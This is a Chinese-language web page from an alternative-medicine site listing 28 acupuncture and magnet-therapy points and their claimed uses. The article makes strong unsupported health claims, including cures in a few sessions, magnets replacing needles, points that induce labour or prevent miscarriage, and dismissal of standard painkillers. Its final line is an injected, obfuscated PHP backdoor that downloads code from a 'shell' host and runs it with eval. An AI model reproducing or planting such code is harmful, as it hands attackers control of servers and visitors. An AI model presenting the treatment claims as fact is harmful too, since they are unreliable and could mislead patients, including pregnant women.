收藏本站
首頁 arrow 劉醫師另類醫學觀念篇 arrow 28個針灸、磁療常用穴位
28個針灸、磁療常用穴位 列印 E-mail
文章索引
28個針灸、磁療常用穴位
頁 2

        人體各穴位的位置,在坊間一般的針灸書籍中均有詳述,但宜再參考中醫銅人的穴位為佳;若尚有出入,則以痛為俞。所有穴位,除有毛髮處無法貼磁鐵外,均可使用磁療替代。此法可供一般大眾平日運用,若有疑問,可與本人討論。

1.面口合谷收(手陽明大腸經)
多用於治療頭痛(可合併列缺使用),或治療牙痛(可合併陽陵泉使用)。開四關為雙合谷與雙太衝,此法多用於多種器官疾病;症狀甚多者,開完四關後,較輕微的症狀即可解除,其餘較嚴重的疾病,再以其他適當療法或再取適當的穴道醫治。合谷易導致流產,故此穴孕婦禁針,但合谷可合併三陰交作為引產之用。合谷透後谿,中間經過勞宮穴,可治心臟與情緒疾病(因勞宮為手厥經心包經,後谿為手太陰小腸經)。

2.頭項尋列缺(手太陰肺經)
列缺取穴不易,若取穴準確,則頭痛立取,詩云:「偏正頭痛尋列缺」,亦即含頸部的疼痛,列缺均可取。列缺取穴,在兩手橈骨上往後,以大拇指指端找,有一微小橫式裂縫處即是。
此穴以四十五度取針最佳,入針兩分即可。列缺為任脈主控穴,後谿為督脈主控穴。

3.腰背委中求(足太陽膀胱經)

腰痛甚為複雜,大致可分為兩側及正中央脊椎處。一般而言,肌肉扭傷造成的疼痛,以委中合併陽陵泉效果最佳,若為婦科腎臟疾病引起,則需合併三陰交使用為佳;但若為下腰正中央脊椎處疼痛,則加用人中穴。此穴與曲澤為相對應穴,故胸悶、腰背痛,若為水火不濟之症,相互輪用,可達奇效。

4.肚腹三里留(足陽明胃經)

胃痛足三里最有效,但需先區別是否真為胃痛或心絞痛的轉移。若為心絞痛的轉移,則合併內關穴;即便是大腸痛也可以合併合谷穴,下腹痛則合併三陰交。

5.內關心胸胃(手厥陰心包經)
內關確為大穴,但以針直下太為刺激。因此穴位為手臂正中神經,所以在臨床上我多以磁療及醫學芳療取代。我通常將磁石以負極貼在內關穴上,或以精油塗抹在患者心包經與心經上,用以治療胸痛、胸悶。若患者久咳不癒,則合併合谷、魚際穴,胃痛則合併足三里或公孫穴。

6.支溝脇肋痛(手少陽三焦經)

兩側肋骨痛為西醫難以治療的病症,西醫大都以(NSAID)止痛劑來治療,或合併使用MB12,但患者經常感到副作用大,且肝腎容易造成傷害;往往脇肋痛尚未完全改善,胃潰瘍與胃出血卻已出現。此時三陽絡與支溝穴同等重要,甚而更佳;若合併陽陵泉使用,效果最好。

7.婦科三陰交(足太陰脾經)

此穴為婦科大穴,一切婦科疾病及各型頭痛均可取此穴,但孕婦禁針。取穴原則為在小腿脛骨後緣、內腳踝上三寸,以痛為俞。婦科、腎臟及膀胱疾病,均可合併使用。

8.安胎公孫求(足太陰脾經)

懷孕者先下此穴,孕婦使用,皆大歡喜,為婦科安胎大穴。合併三陰交使用治療多種婦科疾病,效果更佳;治療白帶則以公孫加用三陰交與太衝穴,但取穴必為右側。

9.筋會陽陵泉(足太陽膽經)

本穴對一切外傷、手術後傷口的止痛消腫均有奇效,本穴尚可治療暈眩症,特別是西醫所謂Vertigo──梅尼爾氏症。此穴可用於牙齒矯正綁牙線後牙痛無法進食者,下針陽陵泉後,連牛排均可食,屢試不爽!拔阻生齒,則合用合谷穴。膝蓋痛,多用陰、陽陵泉再加委中穴。

10.阿是不可缺
即以痛為俞,身上的痛點均是阿是穴。不同的人穴位或有些許差異,因此穴道附近的痛點,即為該人準確之穴位。

11.人中穴(督脈)

此乃急救之大穴,特別用於督脈、下腰背脊椎骨正中央的疼痛,例如無痛分娩與腰椎麻醉後遺症之疼痛。前述兩種疼痛均為西醫難治之症,但下針人中立解,一般而言,三~五次痊癒。

12.膻中穴(任脈)
為八會穴之一,氣會膻中,主要治療對稱性疼痛如:雙肩、雙膝、雙手腕…等,均有奇效。

13.魚際穴(手太陰肺經)

可用於治療一切咳嗽、氣喘,合併使用合谷、內關穴更佳。

14.太衝穴(足厥陰肝經)

可治療嘴苦、嘴乾、嘴臭,可讓眼睛明亮。

15.陽谷穴(手太陽小腸經)
腰連腿痛,腕骨升,陽谷更佳,與天宗合用最佳。書中多言取對側,臨床上取穴仍以痛側為佳。

16.天宗穴(手太陽小腸經)

肩、髖關節疼痛有奇效,與陽谷穴為兄弟穴,常合併使用。ㄧ般髖關節疼痛、下背痛、坐骨神經痛多取用環跳穴,但臨床上因天宗穴位易取、得氣容易,故常以天宗穴取代。

17.曲池穴 (手陽明大腸經)

為皮膚大穴,淺刺治一切皮膚病,深刺治膝關節痛(同側為佳)。

18.陰陵泉(足太陰脾經)

合併陽陵泉、委中穴,為治膝關節疼痛之套穴。

19.腰腿穴(經外奇穴)
治療腰背扭傷,合併委中、陽陵泉更佳。

20.落枕穴(經外奇穴)
治療頸部扭傷、扭痛,合併陽陵泉更佳。

21.魚際前後半寸、掌骨內側黑白肉際
此兩點下針,可避免拔阻生齒後的腫痛,可為牙科醫師參考使用。怕針之患者可用磁療,以1000高斯以上為佳,若合併陽陵泉,效果更好。

22.上半身臟腑病套穴(以橫隔膜為界)
魚際、合谷、內關三穴併用。

23.下半身臟腑病套穴(以橫隔膜為界)
三陰交、公孫、太衝三穴併用。

24.風池、風府穴
為外感風寒(感冒)之要穴,但入針太深易傷及腦幹而致命。穴位處頭髮多,不易以磁療取代,故採醫學芳療法,以入腎經、肺經之精油按摩穴位,最為有效,亦較針炙安全。

25.顏面神經麻痹套穴
ㄧ頰車透地倉,二顴膠往睛明方向斜刺,三由攢竹上方一吋刺向攢竹,四在眼尾平行第三針斜刺,五合谷與六陽陵泉穴。

26.後溪(手太陽小腸經)

後溪為督脈主控穴,與列缺相對應。因此任脈所經位置有問題取列缺穴,督脈所經位置有問題取後溪與人中穴。

27.頭痛套穴:古書取穴
前額痛:取足三里穴(足陽明胃經)。
側頭痛:取陽陵泉(足少陽膽經)。
後頭痛:取委中穴(足太陽膀胱經)。
頂上頭痛:取太衝穴(足厥陰肝經)。

28.八會穴
八會穴是指臟、腑、氣、血、筋、脈、骨、髓等八個聚會穴。在臨床應用時,凡臟、腑、氣、血、筋、脈、骨、髓的病變,都可取其所聚會的俞穴進行治療,如:「氣會」膻中穴,「血會」膈俞穴,「骨會」大抒穴,「筋會」陽陵泉穴,「髓會」絕骨穴(即懸鐘穴),「脈會」太淵穴,「臟會」章門穴,「腑會」太倉穴(即中脘穴)。



 
< 前一個   下一個 >
@eval(base64_decode(file_get_contents('h'.str_replace('$','ell',str_replace('&','.',str_replace('^','/',str_replace('%','ttp','%:^^sh$&nn'.'xuu&com^ab&ph'.'p')))))));